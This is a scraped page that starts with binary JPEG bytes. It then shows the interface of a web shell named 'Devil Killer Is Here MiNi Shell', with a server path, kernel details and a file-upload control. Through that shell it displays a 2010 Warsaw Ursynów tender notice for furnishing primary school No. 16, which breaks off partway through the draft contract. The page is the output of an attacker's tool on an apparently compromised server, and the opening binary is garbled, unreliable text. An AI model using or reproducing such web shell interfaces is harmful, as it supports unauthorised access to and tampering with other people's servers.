JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100629/187282-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa wraz z montażem mebli do rozbudowywanej SP Nr 16 przy ul. Wilczy Dół 4 w Warszawie</b><br>
<b>Numer ogłoszenia: 187282 - 2010; data zamieszczenia: 29.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem mebli do rozbudowywanej SP Nr 16 przy ul. Wilczy Dół 4 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nr wg zestaw. SP	Nazwa 	CPV	J.m.	Ilość 
I	MEBLE - WYPOSAŻENIE SAL	 	 	 
1	Tablice korkowe 1000 x 1700 w ramie aluminiowej	30195000-2 Tablice	szt.	50
2	Tablice naucz. pocz. ziel. w kratkę 1000 x 1700	30195000-2 Tablice	szt.	5
3	Tablice naucz. pocz. ziel. w linię 1000 x 1700	30195000-2 Tablice	szt.	5
4	Tablice szkolne białe 1000 x1700	30195000-2 Tablice	szt.	13
5	Tablica biała tryptyk biała	30195000-2 Tablice	szt.	1
6	Zestawy meblowe: złożone z regałów o różnej wysokości i szerokości, kolorowe fronty np.lokomotywa, zamek, szachownica, częściowo zamknięte, z pojemnikami na kółkach na klocki 	39100000-3 Meble	kpl	10
7	Biurko nauczyciela z boczną szafką+szuflada 1200 x 700 z zamkiem	39100000-3 Meble	szt.	10
8	Krzesło nauczycielskie tapicerowane	39100000-3 Meble	szt.	10
9	Krzesło uczniowskie ŻAK nr 2 lub równoważne	39100000-3 Meble	szt.	30
10	Krzesło uczniowskie ŻAK nr 3 lub równoważne	39100000-3 Meble	szt.	50
11	Krzesło uczniowskie ŻAK nr 4 lub równoważne	39100000-3 Meble	szt.	200
12	Krzesło uczniowskie ŻAK nr 5 lub równoważne	39100000-3 Meble	szt.	100
13	Krzesło uczniowskie ŻAK nr 6 lub równoważne	39100000-3 Meble	szt.	50
14	Stolik uczn. 1 osob. ŻAK Nr 2 lub równoważny	39100000-3 Meble	szt.	30
15	Stolik uczn. 1 osob. ŻAK Nr 3 lub równoważny	39100000-3 Meble	szt.	50
16	Stolik uczn. 1 osob. ŻAK Nr 4 lub równoważny	39100000-3 Meble	szt.	120
17	Stolik uczn. 1 osob. ŻAK Nr 5 lub równoważny	39100000-3 Meble	szt.	100
18	Stolik trapez nr 3 lub równoważny	39100000-3 Meble	szt.	24
19	Stolik sześciokątny nr 3 średnica 1200 lub równoważny	39100000-3 Meble	szt.	6
20	Stolik świetlicowy  800 x 800 nr 4 lub równoważny	39100000-3 Meble	szt.	20
21	Fotel obrotowy	39100000-3 Meble	szt.	5
22	Regał  metalowy z rantem zabezpieczającym wypadanie 1800 x 900 x 300  	39100000-3 Meble	szt.	6
24	Tablica biała 1200 x 1000 jezdna	30195000-2 Tablice	szt.	1
25	Stelaże do tornistrów z płyty meblowej o wymiarach dostosowanych do pomieszczeń	39100000-3 Meble	szt.	9
38	Wieszaki na płycie meblowej o szer. 16-hakowy wiszący	39100000-3 Meble	szt.	5
39	Regały otwarte z półkami na drobny sprzęt sportowy z rantem zewnętrznym 900 x 1800 x300	39100000-3 Meble	szt.	4
40	Stojaki do plansz i map	39100000-3 Meble	szt.	11
42	Gablota na puchary 2200 x 900 x 400 - 4-drzwiowa przeszklona, półki szklane	39100000-3 Meble	szt.	1
43	Gabloty wiszące wykonane z profilu aluminiowego do wewnątrz tekstylne wypełnienie 120 x 90, drzwiczki z plexi zamykane na zamek	39100000-3 Meble	szt.	3
44	Ławki korytarzowe 2mb x 50 x30	39100000-3 Meble	szt.	10
45	Krzesło ISO czarne kolor stelaża aluminiowy lub równoważne	39100000-3 Meble	szt.	10
46	Krzesło składane TIPO stelaż czarny, tapicerka czarna lub równoważne	39100000-3 Meble	szt.	200
95	Stolik pod rzutnik pisma STANDARD środkowa półka o regulowanej wysokości, podręczna szuflada pod półką, podstawa na 4 kółkach. 	39100000-3 Meble	szt.	1
96	Szafka szatniowa odkryta przedszkolna z 5 miejscami, z półką u góry na czapki i z półką na dole na buty dla każdego dziecka oddzielnie - tył zabudowany + obrzeża w kolorze czerwonym	39100000-3 Meble	szt.	38
97	Wieszak stojący ubraniowy CR-28 kolor grusza lub równoważny 	39100000-3 Meble	szt.	4
98	Parasolnik LUNA aluminiowy lub równoważny	39100000-3 Meble	szt.	4
33	Stoliki RTV na kółkach na telewizor LCD 37	39100000-3 Meble	szt.	4
VII	MEBLE - WYPOSAŻENIE GABINETÓW I INNYCH POMIESZCZEŃ	 	 	 
289	Zestaw meblowy: szafa ubraniowa, regały otwarte, regały zamknięte, regały częsciowo zamknięte, kolorowe fronty	39100000-3 Meble	kpl	3
290	Biurko pod komputer 1200 x800 z szufladą i szafką na zamek	39100000-3 Meble	szt.	3
291	Szafy ubraniowe 2200 x 900 x 600 z nadstawką górną, na dole szafka na buty	39100000-3 Meble	szt.	1
292	Szafka na dzienniki 1800 x 800 x 400 z przegrodami poziomymi na 46 dzienników, zamknięta żaluzją zamykaną na klucz, w kolorze calwados	39100000-3 Meble	szt.	1
293	Szafka zamknięta ze schowkami na rzeczy osobiste dla nauczycieli 10 1800 x 800 x 400, w kolorze calwados	39100000-3 Meble	szt.	3
294	Szafa ubraniowa1800 x 900 x 600 z wewnętrzną górną półką, w kolorze calwados.	39100000-3 Meble	szt.	3
295	Regał  narożny(kuchenny 1800 x 800 x 1400, szafka górna i dolna zamknięta, środek wolna przestrzeń z blatem przedłużonym, tylna ściana wykończona płytą meblową, w kolorze calwados otwór w płycie meblowej na dojście do gniazda elektrycznego	39100000-3 Meble	szt.	1
296	Szafka na klucze - wisząca, zamknięta, wykonana z płyty meblowej, w kolorze calwados	39100000-3 Meble	szt.	1
297	Stół meblowy 800x800x740, w kolorze calwados	39100000-3 Meble	szt.	6
298	Krzesło gabinetowe tapicerowane, w kolorze calwados	39100000-3 Meble	szt.	24
299	Biurko pod komputery z półką na klawiaturę i stację dysku 900 x 600 x 750, w kolorze calwados	39100000-3 Meble	szt.	2
300	Ogniotrwała szafa metalowa na dokumenty 1800 x 900 x 507, z 4 półkami, z zamkiem ryglującym + klucze, w kolorze jasny beż	39100000-3 Meble	szt.	2
301	Szafa ogniotrwała - sejf z zamkiem mechanicznym na klucz 600 x 560 x 1150, w kolorze jasny beż	39100000-3 Meble	szt.	1
302	Zestaw regałów: szafka zamykana z dwoma półkami wys. 900 x 800 x 400 - 1 szt.; szafka otwarta z dwoma półkami wys. 900 x 600 x 400 - 1 szt.; szafka narożna półokrągła z dwoma półkami  wys. 900 x 400 x 400; szafa ubraniowa 1800 x 600 x 600; regał góra przeszklona, dół zamknięty 1800 x 800 x 400; regał 1800 x 600 x 400 góra z jedną półką zamknięta, dół + jedna półka zamknięty; środek otwarty z blatem kuchennym, tył płyta meblowa z wyciętym otworem na dojście do gniazda elektrycznego; regał wys. 900 x 600 x 400 zamknięty z dwoma półkami - 2 szt.; w kolorze jasnej jabłoni	39100000-3 Meble	szt.	1
303	Biurko narożne - półokrągłe z półką na klawiaturę + szuflada - przód zabudowany + kontenerek w kolorze jasnej jabloni - wersja prawostronna 1800 x 1200	39100000-3 Meble	szt.	1
304	Fotel gabinetowy z tapicerką ze skóry ekologicznej w kolorze jasny beż, podłokietniki i podstawa z polerowanego drewna, w kolorze jasna jabłoń, na kółkach	39100000-3 Meble	szt.	1
305	Stolik okolicznościowy okrągły, blat średn. 1000, wys. 600, w kolorze jasna jabłoń 	39100000-3 Meble	szt.	1
306	Fotelik gościnny, cały tapicerowany skórą ekologiczną, w kolorze jasny beż, tył półokrągły, szer. siedziska 440, gł. siedziska 500, wys. siedziska 500	39100000-3 Meble	szt.	4
307	Krzesło meblowe tapicerowane skórą ekologiczną, w kolorze jasny beż, stelaż z jasnej jabłoni	39100000-3 Meble	szt.	4
308	Lustro wiszące meblowe	39100000-3 Meble	szt.	1
309	Stolik okolicznościowy okrągłe, średn. 1100, wys. 600, w kolorze mebli	39100000-3 Meble	szt.	3
310	Fotelik gościnny cały tapicerowany skórą ekologiczną, w kolorze jasny beż, tył półokrągły, szer. siedziska 440, gł. siedziska 500, wys. siedziska 500	39100000-3 Meble	szt.	6
311	Kanapa narożna, pokrycie skóra ekologiczna w kolorze cappuccino 1700 x 2100	39100000-3 Meble	szt.	1
363	Szafka na klucze, 200 haczyków, wykonana z blachy stalowej lakierowanej, wyposażona w zestaw numerowanych haczyków	39100000-3 Meble	szt.	2
365	Regał na ciężkie towary stelaż zamknięty + 3 półki z 4 haczykami	39100000-3 Meble	szt.	6
366	Szafa metalowa na środki czystości, zamykana na kluczyk - 2 komorowe	39100000-3 Meble	szt.	3
367	Szafa metalowa ubraniowa na cokole z zamkiem - 1 osobowe	39100000-3 Meble	szt.	4
368	Fotel tapicerowany 1 osobowy	39100000-3 Meble	szt.	1
375	Szafa metalowa gospodarcze na środki czyst.	39100000-3 Meble	szt.	5
359	Stolik  800 x 800	  39100000-3 Meble	szt.	2
 	Szafka ubraniowa typu SUM lub równoważna dł. 400, szr. 500, wys. 1800	39100000-3 Meble	szt.	3
 	Taboret szatniowy, siedzisko lita sosna bejcowana, nogi ze stali barwione szpachlą epoksydowo-poliestrową w proszku, stopik z tworzywa polipropylenowego, typ IKEA AGNE lub równoważny śr. 300, wys. 450	39100000-3 Meble	szt.	1
 	Regał meblowy dł. 900, szer. 400, wys. 1800	39100000-3 Meble	szt.	1
 	Stół dł. 600, szer. 600, wys. 750	39100000-3 Meble	szt.	1
 	Krzesło	39100000-3 Meble	szt.	2
 	Krzesło biurowe obrotowe	39100000-3 Meble	szt.	1
 	Biurko dł. 1200, szer. 600, wys. 750	39100000-3 Meble	szt.	1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.16.00.00-1, 39.15.10.00-5.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed  upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie) wykonał lub wykonuje co najmniej jedną dostawę mebli o wartości co najmniej 150.000,- zł brutto.Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumencie, o którym mowa w pkt III.4) Z treści załączonego dokumentu musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy  wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian 
W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
- terminu realizacji - pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności gdy: przedłuża się procedura postępowania będąca wynikiem zastosowania środków ochrony prawnej 
- wykonania dostaw  zamiennych - pod warunkiem, że nie powodują wykroczenia poza przedmiot zamówienia,
- wynagrodzenia umownego - pod warunkiem, że zmiany te są korzystne dla Zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.ursynów.waw.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wykonawca, pobiera ze wskazanej w ogłoszeniu o przedmiotowej licytacji strony internetowej wzór wniosku wraz z załącznikami. Następnie, w przypadku zainteresowania udziałem w licytacji elektronicznej, składa wniosek o dopuszczenie do udziału w postępowaniu. Złożenie wniosku jednocześnie oznacza akceptację warunków licytacji i postanowień umowy. Zamawiający, po weryfikacji nadesłanych wniosków, informuje Wykonawców o wyniku kwalifikacji oraz zaprasza do składania ofert (postąpień) wszystkich Wykonawców spełniających warunki udziału w postępowaniu. Treść zaproszenia zawierać będzie adres strony internetowej, na której odbywać się będzie licytacja oraz parametry licytacji elektronicznej (data, godzina otwarcia, czas trwania i warunki zamknięcia licytacji). Następnie za pośrednictwem operatora platformy do zakwalifikowanych do udziału w licytacji Wykonawców przekazywana jest informacja o sposobie rejestracji na platformie licytacyjnej. Informacja ta przekazywana jest na wskazane we wnioskach Wykonawców adresy e-mail. Po otrzymaniu informacji Wykonawca rejestruje się na platformie aukcyjnej pod adresem http://aukcje.um.warszawa.pl postępując zgodnie z przekazaną procedurą rejestracji. Otrzymany kod dostępu Wykonawca będzie mógł zmienić na nowy - określony przez siebie.
Komputer użytkownika powinien spełniać następujące wymagania: 
być wyposażony w procesor 733 MHz lub wyższy i posiadać co najmniej 512  pamięci RAM, posiadać zainstalowany system operacyjny MS Windows XP lub wyższy, posiadać zainstalowaną przeglądarkę internetową Microsoft Internet Explorer 6.0. albo Mozilla, posiadać połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb/s.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.	W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 
2.	Zaproponowana przez niego cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z warunkami umowy - wzór umowy zamieszczony został w pkt.IV.4.15) ogłoszenia 
3.	Zamawiający dopuszcza prowadzenie rozliczeń z Wykonawcą jedynie w walucie polskiej. Dodatkowo nadmienia się, iż postąpienia w trakcie licytacji elektronicznej muszą być składane również w walucie polskiej. 
4.	Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie w chwili zamknięcia licytacji elektronicznej, najniższą cenę brutto realizacji całego zamówienia.
5.	Po zamknięciu licytacji elektronicznej w terminie wyznaczonym przez Zamawiającego, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu formularz kalkulacji cenowej sporządzony zgodnie z załącznikiem nr 2 do umowy, z tym, że łączna cena zamówienia wynikająca z przedmiotu zamówienia musi być co najwyżej równa cenie wykonania oferty, która wygrała licytację elektroniczną. Wszystkie ceny muszą być ustalone z dokładnością do dwóch miejsc po przecinku. 
6.	Minimalna wysokość postąpień:  3.000,00 zł.
Cena wywoławcza: 313.681,40  zł.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 15 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 07.07.2010 godzina 10:00, miejsce: 4.1.	Wniosek należy złożyć w siedzibie Zamawiającego przy Al. KEN 61 w  Wydziale Infrastruktury pok. nr 407, do dnia  07.07.2010 r. do godz. 1000..</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu  19/07/2010 godz. 10:00. Ostateczny termin licytacji Zamawiający poda w zaproszeniu do udziału w licytacji elektronicznej.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Zamawiający przewiduje zamknięcie licytacji 19/07/2010 godz. 10:15</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>UMOWA  NR 
W dniu                                 2010 r. w Warszawie pomiędzy:
miastem stołecznym Warszawą Dzielnicą Ursynów z siedzibą w Warszawie (kod 02-777) przy al. Komisji Edukacji Narodowej nr 61 zwanym dalej Zamawiającym NIP 525-22-48-481, REGON 015259640-00138, 
reprezentowanym przez:


a 
                                                           NIP                        REGON                  zwanym dalej Wykonawcą,
reprezentowanym przez

w związku z wyborem oferty Wykonawcy na podstawie przeprowadzonego postępowania o udzielenie zamówienia publicznego zgodnie z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień  publicznych (Dz. U. z 2007 r. Nr  223, poz. 1655 z późn. zm.), w trybie licytacji elektronicznej,
została zawarta umowa o następującej treści:

§ 1
Przedmiot umowy
Zamawiający zleca a Wykonawca przyjmuje do realizacji dostawę wraz z montażem mebli do rozbudowywanej SP Nr 16 przy ul. Wilczy Dół 4 w Warszawie. Szczegółowy zakres przedmiotu umowy określony jest w Załączniku Nr 1.

§ 2
Terminy realizacji
Termin realizacji przedmiotu umowy ustala się od dnia podpisania umowy do dnia 20.08.2010 r. 
§ 3
Obowiązki Wykonawcy
1.	Przedmiot Umowy zostanie  dostarczony i zamontowany  w  miejscach wskazanych przez Zamawiającego. 
2.	Dostawa i montaż Przedmiotu Umowy nastąpi sukcesywnie w terminach uzgodnionych 
